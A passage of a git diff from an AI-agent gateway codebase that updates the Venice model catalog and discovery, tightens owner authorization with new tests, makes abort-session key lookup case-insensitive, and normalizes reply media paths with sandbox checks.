"zai-org-glm-4.6", + name: "GLM 4.6", + reasoning: false, + input: ["text"], + contextWindow: 198000, + maxTokens: 16384, privacy: "private", }, { @@ -193,8 +244,62 @@ export const VENICE_MODEL_CATALOG = [ name: "GLM 4.7", reasoning: true, input: ["text"], - contextWindow: 202752, - maxTokens: 8192, + contextWindow: 198000, + maxTokens: 16384, + privacy: "private", + }, + { + id: "zai-org-glm-4.7-flash", + name: "GLM 4.7 Flash", + reasoning: true, + input: ["text"], + contextWindow: 128000, + maxTokens: 16384, + privacy: "private", + }, + { + id: "zai-org-glm-5", + name: "GLM 5", + reasoning: true, + input: ["text"], + contextWindow: 198000, + maxTokens: 32000, + privacy: "private", + }, + { + id: "kimi-k2-5", + name: "Kimi K2.5", + reasoning: true, + input: ["text", "image"], + contextWindow: 256000, + maxTokens: 65536, + privacy: "private", + }, + { + id: "kimi-k2-thinking", + name: "Kimi K2 Thinking", + reasoning: true, + input: ["text"], + contextWindow: 256000, + maxTokens: 65536, + privacy: "private", + }, + { + id: "minimax-m21", + name: "MiniMax M2.1", + reasoning: true, + input: ["text"], + contextWindow: 198000, + maxTokens: 32768, + privacy: "private", + }, + { + id: "minimax-m25", + name: "MiniMax M2.5", + reasoning: true, + input: ["text"], + contextWindow: 198000, + maxTokens: 32768, privacy: "private", }, @@ -205,21 +310,39 @@ export const VENICE_MODEL_CATALOG = [ // Anthropic (via Venice) { - id: "claude-opus-45", + id: "claude-opus-4-5", name: "Claude Opus 4.5 (via Venice)", reasoning: true, input: ["text", "image"], - contextWindow: 202752, - maxTokens: 8192, + contextWindow: 198000, + maxTokens: 32768, privacy: "anonymized", }, { - id: "claude-sonnet-45", + id: "claude-opus-4-6", + name: "Claude Opus 4.6 (via Venice)", + reasoning: true, + input: ["text", "image"], + contextWindow: 1000000, + maxTokens: 128000, + privacy: "anonymized", + }, + { + id: "claude-sonnet-4-5", name: "Claude Sonnet 4.5 (via Venice)", reasoning: true, input: ["text", "image"], - contextWindow: 202752, - maxTokens: 8192, + contextWindow: 198000, + maxTokens: 64000, + privacy: "anonymized", + }, + { + id: "claude-sonnet-4-6", + name: "Claude Sonnet 4.6 (via Venice)", + reasoning: true, + input: ["text", "image"], + contextWindow: 1000000, + maxTokens: 64000, privacy: "anonymized", }, @@ -229,8 +352,8 @@ export const VENICE_MODEL_CATALOG = [ name: "GPT-5.2 (via Venice)", reasoning: true, input: ["text"], - contextWindow: 262144, - maxTokens: 8192, + contextWindow: 256000, + maxTokens: 65536, privacy: "anonymized", }, { @@ -238,8 +361,44 @@ export const VENICE_MODEL_CATALOG = [ name: "GPT-5.2 Codex (via Venice)", reasoning: true, input: ["text", "image"], - contextWindow: 262144, - maxTokens: 8192, + contextWindow: 256000, + maxTokens: 65536, + privacy: "anonymized", + }, + { + id: "openai-gpt-53-codex", + name: "GPT-5.3 Codex (via Venice)", + reasoning: true, + input: ["text", "image"], + contextWindow: 400000, + maxTokens: 128000, + privacy: "anonymized", + }, + { + id: "openai-gpt-54", + name: "GPT-5.4 (via Venice)", + reasoning: true, + input: ["text", "image"], + contextWindow: 1000000, + maxTokens: 131072, + privacy: "anonymized", + }, + { + id: "openai-gpt-4o-2024-11-20", + name: "GPT-4o (via Venice)", + reasoning: false, + input: ["text", "image"], + contextWindow: 128000, + maxTokens: 16384, + privacy: "anonymized", + }, + { + id: "openai-gpt-4o-mini-2024-07-18", + name: "GPT-4o Mini (via Venice)", + reasoning: false, + input: ["text", "image"], + contextWindow: 128000, + maxTokens: 16384, privacy: "anonymized", }, @@ -249,8 +408,17 @@ export const VENICE_MODEL_CATALOG = [ name: "Gemini 3 Pro (via Venice)", reasoning: true, input: ["text", "image"], - contextWindow: 202752, - maxTokens: 8192, + contextWindow: 198000, + maxTokens: 32768, + privacy: "anonymized", + }, + { + id: "gemini-3-1-pro-preview", + name: "Gemini 3.1 Pro (via Venice)", + reasoning: true, + input: ["text", "image"], + contextWindow: 1000000, + maxTokens: 32768, privacy: "anonymized", }, { @@ -258,8 +426,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Gemini 3 Flash (via Venice)", reasoning: true, input: ["text", "image"], - contextWindow: 262144, - maxTokens: 8192, + contextWindow: 256000, + maxTokens: 65536, privacy: "anonymized", }, @@ -269,8 +437,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Grok 4.1 Fast (via Venice)", reasoning: true, input: ["text", "image"], - contextWindow: 262144, - maxTokens: 8192, + contextWindow: 1000000, + maxTokens: 30000, privacy: "anonymized", }, { @@ -278,28 +446,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Grok Code Fast 1 (via Venice)", reasoning: true, input: ["text"], - contextWindow: 262144, - maxTokens: 8192, - privacy: "anonymized", - }, - - // Other anonymized models - { - id: "kimi-k2-thinking", - name: "Kimi K2 Thinking (via Venice)", - reasoning: true, - input: ["text"], - contextWindow: 262144, - maxTokens: 8192, - privacy: "anonymized", - }, - { - id: "minimax-m21", - name: "MiniMax M2.5 (via Venice)", - reasoning: true, - input: ["text"], - contextWindow: 202752, - maxTokens: 8192, + contextWindow: 256000, + maxTokens: 10000, privacy: "anonymized", }, ] as const; @@ -326,6 +474,7 @@ export function buildVeniceModelDefinition(entry: VeniceCatalogEntry): ModelDefi // See: https://github.com/openclaw/openclaw/issues/15819 compat: { supportsUsageInStreaming: false, + ...("supportsTools" in entry && !entry.supportsTools ? { supportsTools: false } : {}), }, }; } @@ -334,17 +483,18 @@ export function buildVeniceModelDefinition(entry: VeniceCatalogEntry): ModelDefi interface VeniceModelSpec { name: string; privacy: "private" | "anonymized"; - availableContextTokens: number; - capabilities: { - supportsReasoning: boolean; - supportsVision: boolean; - supportsFunctionCalling: boolean; + availableContextTokens?: number; + maxCompletionTokens?: number; + capabilities?: { + supportsReasoning?: boolean; + supportsVision?: boolean; + supportsFunctionCalling?: boolean; }; } interface VeniceModel { id: string; - model_spec: VeniceModelSpec; + model_spec?: VeniceModelSpec; } interface VeniceModelsResponse { @@ -412,6 +562,36 @@ function isRetryableVeniceDiscoveryError(err: unknown): boolean { return hasRetryableNetworkCode(err); } +function normalizePositiveInt(value: unknown): number | undefined { + if (typeof value !== "number" || !Number.isFinite(value) || value <= 0) { + return undefined; + } + return Math.floor(value); +} + +function resolveApiMaxCompletionTokens(params: { + apiModel: VeniceModel; + knownMaxTokens?: number; +}): number | undefined { + const raw = normalizePositiveInt(params.apiModel.model_spec?.maxCompletionTokens); + if (!raw) { + return undefined; + } + const contextWindow = normalizePositiveInt(params.apiModel.model_spec?.availableContextTokens); + const knownMaxTokens = + typeof params.knownMaxTokens === "number" && Number.isFinite(params.knownMaxTokens) + ? Math.floor(params.knownMaxTokens) + : undefined; + const hardCap = knownMaxTokens ?? VENICE_DISCOVERY_HARD_MAX_TOKENS; + const fallbackContextWindow = knownMaxTokens ?? VENICE_DEFAULT_CONTEXT_WINDOW; + return Math.min(raw, contextWindow ?? fallbackContextWindow, hardCap); +} + +function resolveApiSupportsTools(apiModel: VeniceModel): boolean | undefined { + const supportsFunctionCalling = apiModel.model_spec?.capabilities?.supportsFunctionCalling; + return typeof supportsFunctionCalling === "boolean" ? supportsFunctionCalling : undefined; +} + /** * Discover models from Venice API with fallback to static catalog. * The /models endpoint is public and doesn't require authentication. @@ -468,30 +648,50 @@ export async function discoverVeniceModels(): Promise { for (const apiModel of data.data) { const catalogEntry = catalogById.get(apiModel.id); + const apiMaxTokens = resolveApiMaxCompletionTokens({ + apiModel, + knownMaxTokens: catalogEntry?.maxTokens, + }); + const apiSupportsTools = resolveApiSupportsTools(apiModel); if (catalogEntry) { - // Use catalog metadata for known models - models.push(buildVeniceModelDefinition(catalogEntry)); + const definition = buildVeniceModelDefinition(catalogEntry); + if (apiMaxTokens !== undefined) { + definition.maxTokens = apiMaxTokens; + } + // We only let live discovery disable tools. Re-enabling tool support still + // requires a catalog update so a transient/bad /models response cannot + // silently expand the tool execution surface for known models. + if (apiSupportsTools === false) { + definition.compat = { + ...definition.compat, + supportsTools: false, + }; + } + models.push(definition); } else { // Create definition for newly discovered models not in catalog + const apiSpec = apiModel.model_spec; const isReasoning = - apiModel.model_spec.capabilities.supportsReasoning || + apiSpec?.capabilities?.supportsReasoning || apiModel.id.toLowerCase().includes("thinking") || apiModel.id.toLowerCase().includes("reason") || apiModel.id.toLowerCase().includes("r1"); - const hasVision = apiModel.model_spec.capabilities.supportsVision; + const hasVision = apiSpec?.capabilities?.supportsVision === true; models.push({ id: apiModel.id, - name: apiModel.model_spec.name || apiModel.id, + name: apiSpec?.name || apiModel.id, reasoning: isReasoning, input: hasVision ? ["text", "image"] : ["text"], cost: VENICE_DEFAULT_COST, - contextWindow: apiModel.model_spec.availableContextTokens || 128000, - maxTokens: 8192, + contextWindow: + normalizePositiveInt(apiSpec?.availableContextTokens) ?? VENICE_DEFAULT_CONTEXT_WINDOW, + maxTokens: apiMaxTokens ?? VENICE_DEFAULT_MAX_TOKENS, // Avoid usage-only streaming chunks that can break OpenAI-compatible parsers. compat: { supportsUsageInStreaming: false, + ...(apiSupportsTools === false ? { supportsTools: false } : {}), }, }); } diff --git a/src/auto-reply/command-auth.owner-default.test.ts b/src/auto-reply/command-auth.owner-default.test.ts new file mode 100644 index 00000000000..3cb6b48d3fd --- /dev/null +++ b/src/auto-reply/command-auth.owner-default.test.ts @@ -0,0 +1,155 @@ +import { afterEach, beforeEach, describe, expect, it } from "vitest"; +import type { OpenClawConfig } from "../config/config.js"; +import { setActivePluginRegistry } from "../plugins/runtime.js"; +import { createOutboundTestPlugin, createTestRegistry } from "../test-utils/channel-plugins.js"; +import { resolveCommandAuthorization } from "./command-auth.js"; +import type { MsgContext } from "./templating.js"; + +const createRegistry = () => + createTestRegistry([ + { + pluginId: "discord", + plugin: createOutboundTestPlugin({ id: "discord", outbound: { deliveryMode: "direct" } }), + source: "test", + }, + ]); + +beforeEach(() => { + setActivePluginRegistry(createRegistry()); +}); + +afterEach(() => { + setActivePluginRegistry(createRegistry()); +}); + +describe("senderIsOwner only reflects explicit owner authorization", () => { + it("does not treat direct-message senders as owners when no ownerAllowFrom is configured", () => { + const cfg = { + channels: { discord: {} }, + } as OpenClawConfig; + + const ctx = { + Provider: "discord", + Surface: "discord", + ChatType: "direct", + From: "discord:123", + SenderId: "123", + } as MsgContext; + + const auth = resolveCommandAuthorization({ + ctx, + cfg, + commandAuthorized: true, + }); + + expect(auth.senderIsOwner).toBe(false); + expect(auth.isAuthorizedSender).toBe(true); + }); + + it("does not treat group-chat senders as owners when no ownerAllowFrom is configured", () => { + const cfg = { + channels: { discord: {} }, + } as OpenClawConfig; + + const ctx = { + Provider: "discord", + Surface: "discord", + ChatType: "group", + From: "discord:123", + SenderId: "123", + } as MsgContext; + + const auth = resolveCommandAuthorization({ + ctx, + cfg, + commandAuthorized: true, + }); + + expect(auth.senderIsOwner).toBe(false); + expect(auth.isAuthorizedSender).toBe(true); + }); + + it("senderIsOwner is false when ownerAllowFrom is configured and sender does not match", () => { + const cfg = { + channels: { discord: {} }, + commands: { ownerAllowFrom: ["456"] }, + } as OpenClawConfig; + + const ctx = { + Provider: "discord", + Surface: "discord", + From: "discord:789", + SenderId: "789", + } as MsgContext; + + const auth = resolveCommandAuthorization({ + ctx, + cfg, + commandAuthorized: true, + }); + + expect(auth.senderIsOwner).toBe(false); + }); + + it("senderIsOwner is true when ownerAllowFrom matches sender", () => { + const cfg = { + channels: { discord: {} }, + commands: { ownerAllowFrom: ["456"] }, + } as OpenClawConfig; + + const ctx = { + Provider: "discord", + Surface: "discord", + From: "discord:456", + SenderId: "456", + } as MsgContext; + + const auth = resolveCommandAuthorization({ + ctx, + cfg, + commandAuthorized: true, + }); + + expect(auth.senderIsOwner).toBe(true); + }); + + it("senderIsOwner is true when ownerAllowFrom is wildcard (*)", () => { + const cfg = { + channels: { discord: {} }, + commands: { ownerAllowFrom: ["*"] }, + } as OpenClawConfig; + + const ctx = { + Provider: "discord", + Surface: "discord", + From: "discord:anyone", + SenderId: "anyone", + } as MsgContext; + + const auth = resolveCommandAuthorization({ + ctx, + cfg, + commandAuthorized: true, + }); + + expect(auth.senderIsOwner).toBe(true); + }); + + it("senderIsOwner is true for internal operator.admin sessions", () => { + const cfg = {} as OpenClawConfig; + + const ctx = { + Provider: "webchat", + Surface: "webchat", + GatewayClientScopes: ["operator.admin"], + } as MsgContext; + + const auth = resolveCommandAuthorization({ + ctx, + cfg, + commandAuthorized: true, + }); + + expect(auth.senderIsOwner).toBe(true); + }); +}); diff --git a/src/auto-reply/command-auth.ts b/src/auto-reply/command-auth.ts index ed37427d50b..583340c93cd 100644 --- a/src/auto-reply/command-auth.ts +++ b/src/auto-reply/command-auth.ts @@ -350,8 +350,8 @@ export function resolveCommandAuthorization(params: { isInternalMessageChannel(ctx.Provider) && Array.isArray(ctx.GatewayClientScopes) && ctx.GatewayClientScopes.includes("operator.admin"); - const senderIsOwner = senderIsOwnerByIdentity || senderIsOwnerByScope; const ownerAllowlistConfigured = ownerAllowAll || explicitOwners.length > 0; + const senderIsOwner = senderIsOwnerByIdentity || senderIsOwnerByScope || ownerAllowAll; const requireOwner = enforceOwner || ownerAllowlistConfigured; const isOwnerForCommands = !requireOwner ? true diff --git a/src/auto-reply/reply.block-streaming.test.ts b/src/auto-reply/reply.block-streaming.test.ts index 0ac2574fce6..456b8a40f95 100644 --- a/src/auto-reply/reply.block-streaming.test.ts +++ b/src/auto-reply/reply.block-streaming.test.ts @@ -211,7 +211,7 @@ describe("block streaming", () => { expect(onBlockReply).toHaveBeenCalledTimes(1); expect(onBlockReply.mock.calls[0][0]).toMatchObject({ text: "Result", - mediaUrls: ["./image.png"], + mediaUrls: [path.join(home, "openclaw", "image.png")], }); }); }); diff --git a/src/auto-reply/reply/abort.test.ts b/src/auto-reply/reply/abort.test.ts index dab520e6b24..df6fa228890 100644 --- a/src/auto-reply/reply/abort.test.ts +++ b/src/auto-reply/reply/abort.test.ts @@ -356,6 +356,20 @@ describe("abort detection", () => { expect(resolveSessionEntryForKey(undefined, "session-1")).toEqual({}); }); + it("resolves Telegram forum topic session when lookup key has different casing than store", () => { + // Store normalizes keys to lowercase; caller may pass mixed-case. /stop in topic must find entry. + const storeKey = "agent:main:telegram:group:-1001234567890:topic:99"; + const lookupKey = "Agent:Main:Telegram:Group:-1001234567890:Topic:99"; + const store = { + [storeKey]: { sessionId: "pi-topic-99", updatedAt: 0 }, + } as Record; + // Direct lookup fails (store uses lowercase keys); normalization fallback must succeed. + expect(store[lookupKey]).toBeUndefined(); + const result = resolveSessionEntryForKey(store, lookupKey); + expect(result.entry?.sessionId).toBe("pi-topic-99"); + expect(result.key).toBe(storeKey); + }); + it("fast-aborts even when text commands are disabled", async () => { const { cfg } = await createAbortConfig({ commandsTextEnabled: false }); diff --git a/src/auto-reply/reply/abort.ts b/src/auto-reply/reply/abort.ts index ba4d92b1dfa..d0f97f04fa8 100644 --- a/src/auto-reply/reply/abort.ts +++ b/src/auto-reply/reply/abort.ts @@ -12,6 +12,7 @@ import { import type { OpenClawConfig } from "../../config/config.js"; import { loadSessionStore, + resolveSessionStoreEntry, resolveStorePath, type SessionEntry, updateSessionStore, @@ -172,13 +173,22 @@ export function formatAbortReplyText(stoppedSubagents?: number): string { export function resolveSessionEntryForKey( store: Record | undefined, sessionKey: string | undefined, -) { +): { entry?: SessionEntry; key?: string; legacyKeys?: string[] } { if (!store || !sessionKey) { return {}; } - const direct = store[sessionKey]; - if (direct) { - return { entry: direct, key: sessionKey }; + const resolved = resolveSessionStoreEntry({ store, sessionKey }); + if (resolved.existing) { + return resolved.legacyKeys.length > 0 + ? { + entry: resolved.existing, + key: resolved.normalizedKey, + legacyKeys: resolved.legacyKeys, + } + : { + entry: resolved.existing, + key: resolved.normalizedKey, + }; } return {}; } @@ -301,7 +311,7 @@ export async function tryFastAbortFromMessage(params: { if (targetKey) { const storePath = resolveStorePath(cfg.session?.store, { agentId }); const store = loadSessionStore(storePath); - const { entry, key } = resolveSessionEntryForKey(store, targetKey); + const { entry, key, legacyKeys } = resolveSessionEntryForKey(store, targetKey); const resolvedTargetKey = key ?? targetKey; const acpManager = getAcpSessionManager(); const acpResolution = acpManager.resolveSession({ @@ -340,6 +350,11 @@ export async function tryFastAbortFromMessage(params: { applyAbortCutoffToSessionEntry(entry, abortCutoff); entry.updatedAt = Date.now(); store[key] = entry; + for (const legacyKey of legacyKeys ?? []) { + if (legacyKey !== key) { + delete store[legacyKey]; + } + } await updateSessionStore(storePath, (nextStore) => { const nextEntry = nextStore[key] ?? entry; if (!nextEntry) { @@ -349,6 +364,11 @@ export async function tryFastAbortFromMessage(params: { applyAbortCutoffToSessionEntry(nextEntry, abortCutoff); nextEntry.updatedAt = Date.now(); nextStore[key] = nextEntry; + for (const legacyKey of legacyKeys ?? []) { + if (legacyKey !== key) { + delete nextStore[legacyKey]; + } + } }); } else if (abortKey) { setAbortMemory(abortKey, true); diff --git a/src/auto-reply/reply/agent-runner-execution.ts b/src/auto-reply/reply/agent-runner-execution.ts index ed843a73014..6748e3cbe68 100644 --- a/src/auto-reply/reply/agent-runner-execution.ts +++ b/src/auto-reply/reply/agent-runner-execution.ts @@ -45,6 +45,7 @@ import { import { type BlockReplyPipeline } from "./block-reply-pipeline.js"; import type { FollowupRun } from "./queue.js"; import { createBlockReplyDeliveryHandler } from "./reply-delivery.js"; +import { createReplyMediaPathNormalizer } from "./reply-media-paths.js"; import type { TypingSignaler } from "./typing-mode.js"; export type RuntimeFallbackAttempt = { @@ -106,6 +107,11 @@ export async function runAgentTurnWithFallback(params: { const directlySentBlockKeys = new Set(); const runId = params.opts?.runId ?? crypto.randomUUID(); + const normalizeReplyMediaPaths = createReplyMediaPathNormalizer({ + cfg: params.followupRun.run.config, + sessionKey: params.sessionKey, + workspaceDir: params.followupRun.run.workspaceDir, + }); let didNotifyAgentRunStart = false; const notifyAgentRunStart = () => { if (didNotifyAgentRunStart) { @@ -311,7 +317,7 @@ export async function runAgentTurnWithFallback(params: { model, runId, authProfile, - allowRateLimitCooldownProbe: runOptions?.allowRateLimitCooldownProbe, + allowTransientCooldownProbe: runOptions?.allowTransientCooldownProbe, }); return (async () => { const result = await runEmbeddedPiAgent({ @@ -402,6 +408,7 @@ export async function runAgentTurnWithFallback(params: { params.sessionCtx.MessageSidFull ?? params.sessionCtx.MessageSid, normalizeStreamingText, applyReplyToMode: params.applyReplyToMode, + normalizeMediaPaths: normalizeReplyMediaPaths, typingSignals: params.typingSignals, blockStreamingEnabled: params.blockStreamingEnabled, blockReplyPipeline, diff --git a/src/auto-reply/reply/agent-runner-memory.ts b/src/auto-reply/reply/agent-runner-memory.ts index ddb65d0fa22..374d37d52f7 100644 --- a/src/auto-reply/reply/agent-runner-memory.ts +++ b/src/auto-reply/reply/agent-runner-memory.ts @@ -487,7 +487,7 @@ export async function runMemoryFlushIfNeeded(params: { model, runId: flushRunId, authProfile, - allowRateLimitCooldownProbe: runOptions?.allowRateLimitCooldownProbe, + allowTransientCooldownProbe: runOptions?.allowTransientCooldownProbe, }); const result = await runEmbeddedPiAgent({ ...embeddedContext, diff --git a/src/auto-reply/reply/agent-runner-payloads.test.ts b/src/auto-reply/reply/agent-runner-payloads.test.ts index 138efd8e49d..94088b2b5b8 100644 --- a/src/auto-reply/reply/agent-runner-payloads.test.ts +++ b/src/auto-reply/reply/agent-runner-payloads.test.ts @@ -10,8 +10,8 @@ const baseParams = { }; describe("buildReplyPayloads media filter integration", () => { - it("strips media URL from payload when in messagingToolSentMediaUrls", () => { - const { replyPayloads } = buildReplyPayloads({ + it("strips media URL from payload when in messagingToolSentMediaUrls", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "hello", mediaUrl: "file:///tmp/photo.jpg" }], messagingToolSentMediaUrls: ["file:///tmp/photo.jpg"], @@ -21,8 +21,8 @@ describe("buildReplyPayloads media filter integration", () => { expect(replyPayloads[0].mediaUrl).toBeUndefined(); }); - it("preserves media URL when not in messagingToolSentMediaUrls", () => { - const { replyPayloads } = buildReplyPayloads({ + it("preserves media URL when not in messagingToolSentMediaUrls", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "hello", mediaUrl: "file:///tmp/photo.jpg" }], messagingToolSentMediaUrls: ["file:///tmp/other.jpg"], @@ -32,8 +32,63 @@ describe("buildReplyPayloads media filter integration", () => { expect(replyPayloads[0].mediaUrl).toBe("file:///tmp/photo.jpg"); }); - it("applies media filter after text filter", () => { - const { replyPayloads } = buildReplyPayloads({ + it("normalizes sent media URLs before deduping normalized reply media", async () => { + const normalizeMediaPaths = async (payload: { mediaUrl?: string; mediaUrls?: string[] }) => { + const normalizeMedia = (value?: string) => + value === "./out/photo.jpg" ? "/tmp/workspace/out/photo.jpg" : value; + return { + ...payload, + mediaUrl: normalizeMedia(payload.mediaUrl), + mediaUrls: payload.mediaUrls?.map((value) => normalizeMedia(value) ?? value), + }; + }; + + const { replyPayloads } = await buildReplyPayloads({ + ...baseParams, + payloads: [{ text: "hello", mediaUrl: "./out/photo.jpg" }], + messagingToolSentMediaUrls: ["./out/photo.jpg"], + normalizeMediaPaths, + }); + + expect(replyPayloads).toHaveLength(1); + expect(replyPayloads[0]).toMatchObject({ + text: "hello", + mediaUrl: undefined, + mediaUrls: undefined, + }); + }); + + it("drops only invalid media when reply media normalization fails", async () => { + const normalizeMediaPaths = async (payload: { mediaUrl?: string }) => { + if (payload.mediaUrl === "./bad.png") { + throw new Error("Path escapes sandbox root"); + } + return payload; + }; + + const { replyPayloads } = await buildReplyPayloads({ + ...baseParams, + payloads: [ + { text: "keep text", mediaUrl: "./bad.png", audioAsVoice: true }, + { text: "keep second" }, + ], + normalizeMediaPaths, + }); + + expect(replyPayloads).toHaveLength(2); + expect(replyPayloads[0]).toMatchObject({ + text: "keep text", + mediaUrl: undefined, + mediaUrls: undefined, + audioAsVoice: false, + }); + expect(replyPayloads[1]).toMatchObject({ + text: "keep second", + }); + }); + + it("applies media filter after text filter", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "hello world!", mediaUrl: "file:///tmp/photo.jpg" }], messagingToolSentTexts: ["hello world!"], @@ -44,8 +99,8 @@ describe("buildReplyPayloads media filter integration", () => { expect(replyPayloads).toHaveLength(0); }); - it("does not dedupe text for cross-target messaging sends", () => { - const { replyPayloads } = buildReplyPayloads({ + it("does not dedupe text for cross-target messaging sends", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "hello world!" }], messageProvider: "telegram", @@ -58,8 +113,8 @@ describe("buildReplyPayloads media filter integration", () => { expect(replyPayloads[0]?.text).toBe("hello world!"); }); - it("does not dedupe media for cross-target messaging sends", () => { - const { replyPayloads } = buildReplyPayloads({ + it("does not dedupe media for cross-target messaging sends", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "photo", mediaUrl: "file:///tmp/photo.jpg" }], messageProvider: "telegram", @@ -72,8 +127,8 @@ describe("buildReplyPayloads media filter integration", () => { expect(replyPayloads[0]?.mediaUrl).toBe("file:///tmp/photo.jpg"); }); - it("suppresses same-target replies when messageProvider is synthetic but originatingChannel is set", () => { - const { replyPayloads } = buildReplyPayloads({ + it("suppresses same-target replies when messageProvider is synthetic but originatingChannel is set", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "hello world!" }], messageProvider: "heartbeat", @@ -86,8 +141,8 @@ describe("buildReplyPayloads media filter integration", () => { expect(replyPayloads).toHaveLength(0); }); - it("suppresses same-target replies when message tool target provider is generic", () => { - const { replyPayloads } = buildReplyPayloads({ + it("suppresses same-target replies when message tool target provider is generic", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "hello world!" }], messageProvider: "heartbeat", @@ -100,8 +155,8 @@ describe("buildReplyPayloads media filter integration", () => { expect(replyPayloads).toHaveLength(0); }); - it("suppresses same-target replies when target provider is channel alias", () => { - const { replyPayloads } = buildReplyPayloads({ + it("suppresses same-target replies when target provider is channel alias", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "hello world!" }], messageProvider: "heartbeat", @@ -114,8 +169,8 @@ describe("buildReplyPayloads media filter integration", () => { expect(replyPayloads).toHaveLength(0); }); - it("does not suppress same-target replies when accountId differs", () => { - const { replyPayloads } = buildReplyPayloads({ + it("does not suppress same-target replies when accountId differs", async () => { + const { replyPayloads } = await buildReplyPayloads({ ...baseParams, payloads: [{ text: "hello world!" }], messageProvider: "heartbeat", diff --git a/src/auto-reply/reply/agent-runner-payloads.ts b/src/auto-reply/reply/agent-runner-payloads.ts index 38737171c35..263dea9fd54 100644 --- a/src/auto-reply/reply/agent-runner-payloads.ts +++ b/src/auto-reply/reply/agent-runner-payloads.ts @@ -20,7 +20,77 @@ import { shouldSuppressMessagingToolReplies, } from "./reply-payloads.js"; -export function buildReplyPayloads(params: { +function hasPayloadMedia(payload: ReplyPayload): boolean { + return Boolean(payload.mediaUrl) || (payload.mediaUrls?.length ?? 0) > 0; +} + +async function normalizeReplyPayloadMedia(params: { + payload: ReplyPayload; + normalizeMediaPaths?: (payload: ReplyPayload) => Promise; +}): Promise { + if (!params.normalizeMediaPaths || !hasPayloadMedia(params.payload)) { + return params.payload; + } + + try { + return await params.normalizeMediaPaths(params.payload); + } catch (err) { + logVerbose(`reply payload media normalization failed: ${String(err)}`); + return { + ...params.payload, + mediaUrl: undefined, + mediaUrls: undefined, + audioAsVoice: false, + }; + } +} + +async function normalizeSentMediaUrlsForDedupe(params: { + sentMediaUrls: string[]; + normalizeMediaPaths?: (payload: ReplyPayload) => Promise; +}): Promise { + if (params.sentMediaUrls.length === 0 || !params.normalizeMediaPaths) { + return params.sentMediaUrls; + } + + const normalizedUrls: string[] = []; + const seen = new Set(); + for (const raw of params.sentMediaUrls) { + const trimmed = raw.trim(); + if (!trimmed) { + continue; + } + if (!seen.has(trimmed)) { + seen.add(trimmed); + normalizedUrls.push(trimmed); + } + try { + const normalized = await params.normalizeMediaPaths({ + mediaUrl: trimmed, + mediaUrls: [trimmed], + }); + const normalizedMediaUrls = normalized.mediaUrls?.length + ? normalized.mediaUrls + : normalized.mediaUrl + ? [normalized.mediaUrl] + : []; + for (const mediaUrl of normalizedMediaUrls) { + const candidate = mediaUrl.trim(); + if (!candidate || seen.has(candidate)) { + continue; + } + seen.add(candidate); + normalizedUrls.push(candidate); + } + } catch (err) { + logVerbose(`messaging tool sent-media normalization failed: ${String(err)}`); + } + } + + return normalizedUrls; +} + +export async function buildReplyPayloads(params: { payloads: ReplyPayload[]; isHeartbeat: boolean; didLogHeartbeatStrip: boolean; @@ -40,7 +110,8 @@ export function buildReplyPayloads(params: { originatingChannel?: OriginatingChannelType; originatingTo?: string; accountId?: string; -}): { replyPayloads: ReplyPayload[]; didLogHeartbeatStrip: boolean } { + normalizeMediaPaths?: (payload: ReplyPayload) => Promise; +}): Promise<{ replyPayloads: ReplyPayload[]; didLogHeartbeatStrip: boolean }> { let didLogHeartbeatStrip = params.didLogHeartbeatStrip; const sanitizedPayloads = params.isHeartbeat ? params.payloads @@ -66,22 +137,27 @@ export function buildReplyPayloads(params: { return [{ ...payload, text: stripped.text }]; }); - const replyTaggedPayloads: ReplyPayload[] = applyReplyThreading({ - payloads: sanitizedPayloads, - replyToMode: params.replyToMode, - replyToChannel: params.replyToChannel, - currentMessageId: params.currentMessageId, - }) - .map( - (payload) => - normalizeReplyPayloadDirectives({ + const replyTaggedPayloads = ( + await Promise.all( + applyReplyThreading({ + payloads: sanitizedPayloads, + replyToMode: params.replyToMode, + replyToChannel: params.replyToChannel, + currentMessageId: params.currentMessageId, + }).map(async (payload) => { + const parsed = normalizeReplyPayloadDirectives({ payload, currentMessageId: params.currentMessageId, silentToken: SILENT_REPLY_TOKEN, parseMode: "always", - }).payload, + }).payload; + return await normalizeReplyPayloadMedia({ + payload: parsed, + normalizeMediaPaths: params.normalizeMediaPaths, + }); + }), ) - .filter(isRenderablePayload); + ).filter(isRenderablePayload); // Drop final payloads only when block streaming succeeded end-to-end. // If streaming aborted (e.g., timeout), fall back to final payloads. @@ -110,6 +186,12 @@ export function buildReplyPayloads(params: { // If target metadata is unavailable, keep legacy dedupe behavior. const dedupeMessagingToolPayloads = suppressMessagingToolReplies || messagingToolSentTargets.length === 0; + const messagingToolSentMediaUrls = dedupeMessagingToolPayloads + ? await normalizeSentMediaUrlsForDedupe({ + sentMediaUrls: params.messagingToolSentMediaUrls ?? [], + normalizeMediaPaths: params.normalizeMediaPaths, + }) + : (params.messagingToolSentMediaUrls ?? []); const dedupedPayloads = dedupeMessagingToolPayloads ? filterMessagingToolDuplicates({ payloads: replyTaggedPayloads, @@ -119,7 +201,7 @@ export function buildReplyPayloads(params: { const mediaFilteredPayloads = dedupeMessagingToolPayloads ? filterMessagingToolMediaDuplicates({ payloads: dedupedPayloads, - sentMediaUrls: params.messagingToolSentMediaUrls ?? [], + sentMediaUrls: messagingToolSentMediaUrls, }) : dedupedPayloads; // Filter out payloads already sent via pipeline or directly during tool flush. diff --git a/src/auto-reply/reply/agent-runner-utils.ts b/src/auto-reply/reply/agent-runner-utils.ts index 960a1f21fed..b7ec4858e51 100644 --- a/src/auto-reply/reply/agent-runner-utils.ts +++ b/src/auto-reply/reply/agent-runner-utils.ts @@ -166,7 +166,7 @@ export function buildEmbeddedRunBaseParams(params: { model: string; runId: string; authProfile: ReturnType; - allowRateLimitCooldownProbe?: boolean; + allowTransientCooldownProbe?: boolean; }) { return { sessionFile: params.run.sessionFile, @@ -187,7 +187,7 @@ export function buildEmbeddedRunBaseParams(params: { bashElevated: 